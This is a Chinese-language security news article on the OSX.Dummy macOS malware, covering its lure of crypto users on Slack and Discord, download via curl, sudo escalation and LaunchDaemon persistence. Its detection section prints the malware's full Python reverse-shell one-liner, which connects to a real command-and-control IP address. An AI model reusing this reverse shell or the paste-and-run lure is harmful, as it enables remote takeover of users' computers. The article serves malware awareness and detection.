MacOS出现新型OSX.Dummy恶意软件

      近期，MacOS上又传播一种新型的恶意软件，被称为OSX.Dummy。攻击者通过欺骗和引导用户下载和执行恶意二进制文件，如果文件被执行，并且恶意软件能够连接到对手的C2服务器（命令控制服务器），攻击者就可以控制目标系统。 使用MacOS恶意软件的黑客瞄准使用Slack和Discord聊天平台的加密货币投资者。被称为OSX.Dummy的恶意软件使用了一种不太复杂的感染方法，但是也有许多用户被感染，并在受害电脑上远程执行任意代码。

恶意软件OSX.Dummy简介

      研究人员Remco Verhoef首先发现并描述了恶意软件，并向SANS InfoSec Handlers Diary Blog发布了他的发现。研究人员说，他上周观察到多次攻击。

通过假冒来自加密相关的Slack或Discord聊天组的管理员或关键人物。分享恶意代码，导致下载和执行恶意二进制文件 。

      Wardle指出，这个二进制文件没有签名，并补充说，恶意软件能够避开macOS Gatekeeper安全软件。

“通常，这样的二进制文件将被网关阻止。但是，如果用户 通过终端命令直接 下载并运行二进制文件  ，网关不会发挥作用，因此无符号二进制文件将被允许执行，内置的macOS恶意软件缓解将不再起作用。”

      被称为恶意软件OSX.Dummy，因为用于转储受害者密码的目录之一被称为“/ tmp / dumpdummy”。

恶意软件攻击原理分析

      攻击者会诱使用户执行脚本，然后通过cURL下载重要的34Mb OSX.Dummy恶意软件。下载文件保存在macOS / tmp / script目录下，然后执行。

“该文件是一个大型的mach064二进制文件（34M），在VirusTotal上评分为0/60，”

      该脚本欺骗受害者下载OSX.Dummy。

      当执行恶意软件二进制文件时，macOS sudo命令（通过终端）将恶意软件的权限更改为root。“他要求用户在终端上输入他们的密码，”根据Apple的说法，“要在Mac上的终端中执行sudo命令，您必须使用具有密码的管理员帐户登录。” 成功安装以后，恶意软件会丢弃各种macOS目录中的代码，包括“/Library/LaunchDaemons/com.startup.plist”，它提供了OSX.Dummy持久性。

 

      Wardle指出，如果攻击成功，并且恶意软件能够连接到对手的C2服务器，攻击者就可以控制目标系统。

最后 检测及防范方法

      今天我们分析了一个新的mac恶意软件。我称之为OSX.Dummy为：

• 感染方法很愚蠢
• 二进制的巨大规模是愚蠢的
• 持久性机制是蹩脚的（因此也是愚蠢的）
• 能力相当有限（因而相当愚蠢）
• 在每一步（愚蠢）检测都是微不足道的
• ...最后，恶意软件将用户的密码保存到 dumpdummy

      要检查您是否被感染，请以root身份运行KnockKnock（因为恶意软件集的组件只能由root读取）。查找 com.startup.plist 执行名为'script.sh' 的未签名启动项：

      还可以查找以root身份运行的python运行实例，并使用上述反向shell命令：

$ ps aux | grep -i python
root python -c import socket,subprocess,os; 
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 
s.connect(("185.243.115.230",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);

转自：安全加

标签： 安全 代码 服务器 脚本 权限

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点！
本站所提供的图片等素材，版权归原作者所有，如需使用，请与原作者联系。